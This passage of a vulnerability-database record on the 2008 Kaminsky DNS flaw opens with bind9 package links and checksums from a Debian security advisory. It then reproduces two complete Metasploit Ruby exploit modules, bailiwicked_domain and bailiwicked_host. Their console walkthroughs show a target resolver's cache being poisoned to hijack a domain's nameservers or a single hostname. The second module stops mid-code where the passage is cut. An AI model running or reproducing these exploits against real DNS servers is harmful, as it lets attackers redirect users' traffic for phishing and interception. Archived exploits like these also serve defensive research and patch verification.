http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 196598 2198086ee8c358aa3ed5046708a31f45\n 
http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 194704 c897d956b11161ae8e31e4bffb489883\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 118140 e5e11d59852a32dcd1b78b4aabd22fff\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 95664 050d558c3d06e520fb4e6c6cebd520c3\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 579484 6fc80f5cde0c2d01b49ae53f027eeecc\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 97786 5dda64259aa80e1c2e085e7fc2430299\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 300090 21095a9477d8db8bdbca300235ddc296\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 210606 8bd074b427b5f732c5584ca265bb2c28\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 1121664 2750abf3a8e3ffa54d1b15f6a5b6738e\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 94822 4e2634cf2561a237174a6863377b24cd\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 175248 4231a2791083fc82977535613d38ef2a\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 184036 aea98952994fb97c74df02ae4ed2f28d\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 107574 b6a3a3204c134d54dce2d8d79f77f647\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 493628 b5c5a9638091fd0d6543a405bfdefd53\n 
http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 94828 4657a6a42f7f2fac5ef96d273e9de4df\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 114258 32f88744a6e6e648377dda42ff910cbb\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 111158 a59dbf1edb5518b09b2993049922c01a\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 9, "modified": "2008-07-08T17:03:22", "published": "2008-07-08T17:03:22", "id": "DEBIAN:DSA-1603-1:C7E04", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00184.html", "title": "[SECURITY] [DSA 1603-1] New bind9 packages fix cache poisoning", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:07", "description": "", "published": "2008-07-24T00:00:00", "type": "packetstorm", "title": "bailiwicked_domain.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "PACKETSTORM:68473", "href": "https://packetstormsecurity.com/files/68473/bailiwicked_domain.rb.txt.html", "sourceData": "` ____ ____ __ __ \n/ \\ / \\ | | | | \n----====####/ /\\__\\##/ /\\ \\##| |##| |####====---- \n| | | |__| | | | | | \n| | ___ | __ | | | | | \n------======######\\ \\/ /#| |##| |#| |##| |######======------ \n\\____/ |__| |__| \\______/ \n \nComputer Academic Underground \nhttp://www.caughq.org \nExploit Code \n 
\n===============/======================================================== \nExploit ID: CAU-EX-2008-0003 \nRelease Date: 2008.07.23 \nTitle: bailiwicked_domain.rb \nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains \nTested: BIND 9.4.1-9.4.2 \nAttributes: Remote, Poison, Resolver, Metasploit \nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt \nAuthor/Email: I)ruid <druid (@) caughq.org> \nH D Moore <hdm (@) metasploit.com> \n===============/======================================================== \n \nDescription \n=========== \n \nThis exploit targets a fairly ubiquitous flaw in DNS implementations \nwhich allow the insertion of malicious DNS records into the cache of the \ntarget nameserver. This exploit caches a single malicious nameserver \nentry into the target nameserver which replaces the legitimate \nnameservers for the target domain. By causing the target nameserver to \nquery for random hostnames at the target domain, the attacker can spoof \na response to the target server including an answer for the query, an \nauthority server record, and an additional record for that server, \ncausing target nameserver to insert the additional record into the \ncache. This insertion completely replaces the original nameserver \nrecords for the target domain. 
\n \n \nExample \n======= \n \n# /msf3/msfconsole \n \n## ### ## ## \n## ## #### ###### #### ##### ##### ## #### ###### \n####### ## ## ## ## ## ## ## ## ## ## ### ## \n####### ###### ## ##### #### ## ## ## ## ## ## ## \n## # ## ## ## ## ## ## ##### ## ## ## ## ## \n## ## #### ### ##### ##### ## #### #### #### ### \n## \n \n \n=[ msf v3.2-release \n+ -- --=[ 298 exploits - 124 payloads \n+ -- --=[ 18 encoders - 6 nops \n=[ 73 aux \n \nmsf > use auxiliary/spoof/dns/bailiwicked_domain \nmsf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D \nRHOST => A.B.C.D \nmsf auxiliary(bailiwicked_domain) > set DOMAIN example.com \nDOMAIN => example.com \nmsf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com \nNEWDNS => dns01.metasploit.com \nmsf auxiliary(bailiwicked_domain) > set SRCPORT 0 \nSRCPORT => 0 \nmsf auxiliary(bailiwicked_domain) > check \n[*] Using the Metasploit service to verify exploitability... \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] FAIL: This server uses static source ports and is vulnerable to poisoning \nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D \n[*] exec: dig +short -t ns example.com @A.B.C.D \n \nb.iana-servers.net. \na.iana-servers.net. \n \nmsf auxiliary(bailiwicked_domain) > run \n[*] Switching to target port 50391 based on Metasploit service \n[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com \n[*] Querying recon nameserver for example.com.'s nameservers... \n[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net. \n[*] Querying recon nameserver for address of b.iana-servers.net.... \n[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236 \n[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com.... \n[*] b.iana-servers.net. 
is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net. \n[*] Querying recon nameserver for address of a.iana-servers.net.... \n[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43 \n[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com.... \n[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391... \n[*] Sent 1000 queries and 20000 spoofed responses... \n[*] Sent 2000 queries and 40000 spoofed responses... \n[*] Sent 3000 queries and 60000 spoofed responses... \n[*] Sent 4000 queries and 80000 spoofed responses... \n[*] Sent 5000 queries and 100000 spoofed responses... \n[*] Sent 6000 queries and 120000 spoofed responses... \n[*] Sent 7000 queries and 140000 spoofed responses... \n[*] Sent 8000 queries and 160000 spoofed responses... \n[*] Sent 9000 queries and 180000 spoofed responses... \n[*] Sent 10000 queries and 200000 spoofed responses... \n[*] Sent 11000 queries and 220000 spoofed responses... \n[*] Sent 12000 queries and 240000 spoofed responses... \n[*] Sent 13000 queries and 260000 spoofed responses... \n[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com \n[*] Auxiliary module execution completed \n \nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D \n[*] exec: dig +short -t ns example.com @A.B.C.D \n \ndns01.metasploit.com. \n \n \nCredits \n======= \n \nDan Kaminsky is credited with originally discovering this vulnerability. 
\n \n \nReferences \n========== \n \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 \nhttp://www.kb.cert.org/vuls/id/800113 \n \n \nMetasploit \n========== \n \nrequire 'msf/core' \nrequire 'net/dns' \nrequire 'scruby' \nrequire 'resolv' \n \nmodule Msf \n \nclass Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary \n \ninclude Exploit::Remote::Ip \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DNS BailiWicked Domain Attack', \n'Description' => %q{ \nThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \nDan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target \ndomains nameserver entries in a vulnerable DNS cache server. This attack works \nby sending random hostname queries to the target DNS server coupled with spoofed \nreplies to those queries from the authoritative nameservers for that domain. \nEventually, a guessed ID will match, the spoofed packet will get accepted, and \nthe nameserver entries for the target domain will be replaced by the server \nspecified in the NEWDNS option of this exploit. 
\n}, \n'Author' => [ 'I)ruid', 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 5590 $', \n'References' => \n[ \n[ 'CVE', '2008-1447' ], \n[ 'US-CERT-VU', '8000113' ], \n[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ], \n], \n'DisclosureDate' => 'Jul 21 2008' \n)) \n \nregister_options( \n[ \nOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]), \nOptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), \nOptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), \nOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), \nOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), \nOptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]), \n], self.class) \n \nend \n \ndef auxiliary_commands \nreturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" } \nend \n \ndef cmd_check(*args) \ntarg = args[0] || rhost() \nif(not (targ and targ.length > 0)) \nprint_status(\"usage: check [dns-server]\") \nreturn \nend \n \nprint_status(\"Using the Metasploit service to verify exploitability...\") \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => targ, \n'PeerPort' => 53 \n) \n \nrandom = false \nports = [] \nlport = nil \n \n1.upto(5) do |i| \n \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \n \nprint_status(\" >> ADDRESS: #{t_addr} PORT: #{t_port}\") \nt_port = t_port.to_i \nif(lport and lport != t_port) \nrandom = true \nend \nlport = 
t_port \nports << t_port \nend \nend \nend \nend \n \nsrv_sock.close \n \nif(ports.length < 5) \nprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\") \nreturn \nend \n \nif(random) \nprint_status(\"PASS: This server does not use a static source port. Ports: #{ports.join(\", \")}\") \nprint_status(\" This server may still be exploitable, but not by this tool.\") \nelse \nprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\") \nend \nend \n \ndef run \ntarget = rhost() \nsource = Rex::Socket.source_address(target) \nsport = datastore['SRCPORT'] \ndomain = datastore['DOMAIN'] + '.' \nnewdns = datastore['NEWDNS'] \nrecons = datastore['RECONS'] \nxids = datastore['XIDS'].to_i \nnewttl = datastore['TTL'].to_i \nxidbase = rand(20001) + 20000 \n \naddress = Rex::Text.rand_text(4).unpack(\"C4\").join(\".\") \n \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => target, \n'PeerPort' => 53 \n) \n \n# Get the source port via the metasploit service if it's not set \nif sport.to_i == 0 \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \nsport = t_port.to_i \n \nprint_status(\"Switching to target port #{sport} based on Metasploit service\") \nif target != t_addr \nprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\") \nend \nend \nend \nend \nend \n \n# Verify its not already poisoned \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(domain, Resolv::DNS::Resource::IN::NS) \nquery.rd = 0 \n \nbegin \ncached = 
false \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \n \nif((name.to_s + \".\") == domain and data.name.to_s == newdns) \nt = Time.now + ttl \nprint_status(\"Failure: This domain is already using #{newdns} as a nameserver\") \nprint_status(\" Cache entry expires on #{t.to_s}\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \nend \n \nend \nend until not cached \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \n \n \nres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver \n \nprint_status \"Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}\" \n \n# Look up the nameservers for the domain \nprint_status \"Querying recon nameserver for #{domain}'s nameservers...\" \nanswer0 = res0.send(domain, Net::DNS::NS) \n#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\" \n \nbarbs = [] # storage for nameservers \nanswer0.answer.each do |rr0| \nprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\" \nif rr0.type == 'NS' \nprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\" \nanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname \n#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\" \nanswer1.answer.each do |rr1| \nprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\" \nres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \nprint_status \" Checking Authoritativeness: Querying #{rr1.address} for #{domain}...\" \nanswer2 = res2.send(domain) \nif answer2 and answer2.header.auth? 
and answer2.header.anCount >= 1 \nnsrec = {:name => rr0.nsdname, :addr => rr1.address} \nbarbs << nsrec \nprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\" \nend \nend \nend \nend \n \nif barbs.length == 0 \nprint_status( \"No DNS servers found.\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \n \n# Flood the target with queries and spoofed responses, one will eventually hit \nqueries = 0 \nresponses = 0 \n \nconnect_ip if not ip_sock \n \nprint_status( \"Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...\") \n \nwhile true \nrandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname \n \n# Send spoofed query \nreq = Resolv::DNS::Message.new \nreq.id = rand(2**16) \nreq.add_question(randhost, Resolv::DNS::Resource::IN::A) \n \nreq.rd = 1 \n \nbuff = ( \nScruby::IP.new( \n#:src => barbs[0][:addr].to_s, \n:src => source, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => (rand((2**16)-1024)+1024).to_i, \n:dport => 53 \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nqueries += 1 \n \n# Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) \nreq.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns))) \nreq.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored \nreq.qr = 1 \nreq.aa = 1 \n \nxidbase.upto(xidbase+xids-1) do |id| \nreq.id = id \nbarbs.each do |barb| \nbuff = ( \nScruby::IP.new( \n#:src => barbs[i][:addr].to_s, \n:src => barb[:addr].to_s, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => 53, \n:dport => sport.to_i \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nresponses += 1 \nend \nend \n \n# status update \nif queries % 1000 == 0 \nprint_status(\"Sent #{queries} queries and #{responses} spoofed responses...\") \nend \n 
\n# every so often, check and see if the target is poisoned... \nif queries % 250 == 0 \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(domain, Resolv::DNS::Resource::IN::NS) \nquery.rd = 0 \n \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == domain and data.name.to_s == newdns) \nprint_status(\"Poisoning successful after #{queries} attempts: #{domain} == #{newdns}\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \nend \nend \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \nend \n \nend \n \nend \n \nend \nend \n \n \n-- \nI)ruid, C\u00b2ISSP \ndruid@caughq.org \nhttp://druid.caughq.org \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/68473/bailiwicked_domain.rb.txt"}, {"lastseen": "2016-12-05T22:20:49", "description": "", "published": "2008-07-24T00:00:00", "type": "packetstorm", "title": "bailiwicked_host.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "PACKETSTORM:68471", "href": "https://packetstormsecurity.com/files/68471/bailiwicked_host.rb.txt.html", "sourceData": "` ____ ____ __ __ \n/ \\ / \\ | | | | \n----====####/ /\\__\\##/ /\\ \\##| |##| |####====---- \n| | | |__| | | | | | \n| | ___ | __ | | | | | \n------======######\\ \\/ /#| |##| |#| |##| |######======------ \n\\____/ |__| |__| \\______/ \n \nComputer Academic Underground \nhttp://www.caughq.org \nExploit Code \n \n===============/======================================================== \nExploit ID: CAU-EX-2008-0002 \nRelease Date: 2008.07.23 \nTitle: bailiwicked_host.rb \nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit \nTested: BIND 9.4.1-9.4.2 
\nAttributes: Remote, Poison, Resolver, Metasploit \nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt \nAuthor/Email: I)ruid <druid (@) caughq.org> \nH D Moore <hdm (@) metasploit.com> \n===============/======================================================== \n \nDescription \n=========== \n \nThis exploit targets a fairly ubiquitous flaw in DNS implementations \nwhich allow the insertion of malicious DNS records into the cache of the \ntarget nameserver. This exploit caches a single malicious host entry \ninto the target nameserver. By causing the target nameserver to query \nfor random hostnames at the target domain, the attacker can spoof a \nresponse to the target server including an answer for the query, an \nauthority server record, and an additional record for that server, \ncausing target nameserver to insert the additional record into the \ncache. \n \n \nExample \n======= \n \n# /msf3/msfconsole \n \n_ _ _ _ \n| | | | (_) | \n_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ \n| '_ ` _ \\ / _ \\ __/ _` / __| '_ \\| |/ _ \\| | __| \n| | | | | | __/ || (_| \\__ \\ |_) | | (_) | | |_ \n|_| |_| |_|\\___|\\__\\__,_|___/ .__/|_|\\___/|_|\\__| \n| | \n|_| \n \n \n=[ msf v3.2-release \n+ -- --=[ 298 exploits - 124 payloads \n+ -- --=[ 18 encoders - 6 nops \n=[ 72 aux \n \nmsf > use auxiliary/spoof/dns/bailiwicked_host \nmsf auxiliary(bailiwicked_host) > show options \n \nModule options: \n \nName Current Setting Required Description \n---- --------------- -------- ----------- \nHOSTNAME pwned.example.com yes Hostname to hijack \nNEWADDR 1.3.3.7 yes New address for hostname \nRECONS 208.67.222.222 yes Nameserver used for reconnaissance \nRHOST yes The target address \nSRCPORT yes The target server's source query port (0 for automatic) \nXIDS 10 yes Number of XIDs to try for each query \n \nmsf auxiliary(bailiwicked_host) > set RHOST A.B.C.D \nRHOST => A.B.C.D \n \nmsf auxiliary(bailiwicked_host) > check \n[*] Using the Metasploit service to verify 
exploitability... \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] FAIL: This server uses static source ports and is vulnerable to poisoning \n \nmsf auxiliary(bailiwicked_host) > set SRCPORT 0 \nSRCPORT => 0 \n \nmsf auxiliary(bailiwicked_host) > run \n[*] Switching to target port 48178 based on Metasploit service \n[*] Targeting nameserver A.B.C.D \n[*] Querying recon nameserver for example.com.'s nameservers... \n[*] Got answer with 2 answers, 0 authorities \n[*] Got an NS record: example.com. 172643 IN NS ns89.worldnic.com. \n[*] Querying recon nameserver for address of ns89.worldnic.com.... \n[*] Got answer with 1 answers, 0 authorities \n[*] Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45 \n[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com.... \n[*] ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Got an NS record: example.com. 172643 IN NS ns90.worldnic.com. \n[*] Querying recon nameserver for address of ns90.worldnic.com.... \n[*] Got answer with 1 answers, 0 authorities \n[*] Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45 \n[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com.... \n[*] ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Attempting to inject a poison record for pwned.example.com. into A.B.C.D:48178... \n[*] Sent 1000 queries and 20000 spoofed responses... \n[*] Sent 2000 queries and 40000 spoofed responses... \n[*] Sent 3000 queries and 60000 spoofed responses... \n[*] Sent 4000 queries and 80000 spoofed responses... \n[*] Sent 5000 queries and 100000 spoofed responses... \n[*] Sent 6000 queries and 120000 spoofed responses... \n[*] Sent 7000 queries and 140000 spoofed responses... 
\n[*] Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7 \n[*] Auxiliary module execution completed \nmsf auxiliary(bailiwicked_host) > \n \nmsf auxiliary(bailiwicked_host) > nslookup pwned.example.com A.B.C.D \n[*] exec: nslookup pwned.example.com A.B.C.D \n \nServer: A.B.C.D \nAddress: A.B.C.D#53 \n \nNon-authoritative answer: \nName: pwned.example.com \nAddress: 1.3.3.7 \n \n \nCredits \n======= \n \nDan Kaminsky is credited with originally discovering this vulnerability. \n \n \nReferences \n========== \n \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 \nhttp://www.kb.cert.org/vuls/id/800113 \n \n \nMetasploit \n========== \n \nrequire 'msf/core' \nrequire 'net/dns' \nrequire 'scruby' \nrequire 'resolv' \n \nmodule Msf \n \nclass Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary \n \ninclude Exploit::Remote::Ip \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DNS BailiWicked Host Attack', \n'Description' => %q{ \nThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \nDan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single \nmalicious host entry into the target nameserver by sending random sub-domain \nqueries to the target DNS server coupled with spoofed replies to those \nqueries from the authoritative nameservers for the domain which contain a \nmalicious host entry for the hostname to be poisoned in the authority and \nadditional records sections. Eventually, a guessed ID will match and the \nspoofed packet will get accepted, and due to the additional hostname entry \nbeing within bailiwick constraints of the original request the malicious host \nentry will get cached. 
\n}, \n'Author' => [ 'I)ruid', 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 5585 $', \n'References' => \n[ \n[ 'CVE', '2008-1447' ], \n[ 'US-CERT-VU', '8000113' ], \n[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ], \n], \n'Privileged' => true, \n'Targets' => \n[ \n[\"BIND\", \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n}, \n], \n], \n'DisclosureDate' => 'Jul 21 2008' \n)) \n \nregister_options( \n[ \nOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]), \nOptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']), \nOptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']), \nOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), \nOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), \nOptInt.new('TTL', [true, 'TTL for the malicious host entry', 31337]), \n], self.class) \n \nend \n \ndef auxiliary_commands \nreturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" } \nend \n \ndef cmd_check(*args) \ntarg = args[0] || rhost() \nif(not (targ and targ.length > 0)) \nprint_status(\"usage: check [dns-server]\") \nreturn \nend \n \nprint_status(\"Using the Metasploit service to verify exploitability...\") \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => targ, \n'PeerPort' => 53 \n) \n \nrandom = false \nports = [] \nlport = nil \n \n1.upto(5) do |i| \n \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \n \nprint_status(\" >> ADDRESS: 
#{t_addr} PORT: #{t_port}\") \nt_port = t_port.to_i \nif(lport and lport != t_port) \nrandom = true \nend \nlport = t_port \nports << t_port \nend \nend \nend \nend \n \nsrv_sock.close \n \nif(ports.length < 5) \nprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\") \nreturn \nend \n \nif(random) \nprint_status(\"PASS: This server does not use a static source port. Ports: #{ports.join(\", \")}\") \nprint_status(\" This server may still be exploitable, but not by this tool.\") \nelse \nprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\") \nend \nend \n \ndef run \ntarget = rhost() \nsource = Rex::Socket.source_address(target) \nsport = datastore['SRCPORT'] \nhostname = datastore['HOSTNAME'] + '.' \naddress = datastore['NEWADDR'] \nrecons = datastore['RECONS'] \nxids = datastore['XIDS'].to_i \nttl = datastore['TTL'].to_i \nxidbase = rand(4)+2*10000 \n \ndomain = hostname.match(/[^\\x2e]+\\x2e[^\\x2e]+\\x2e$/)[0] \n \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => target, \n'PeerPort' => 53 \n) \n \n# Get the source port via the metasploit service if it's not set \nif sport.to_i == 0 \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \nsport = t_port.to_i \n \nprint_status(\"Switching to target port #{sport} based on Metasploit service\") \nif target != t_addr \nprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\") \nend \nend \nend \nend \nend \n \n# Verify its not already cached \nbegin \nquery = 
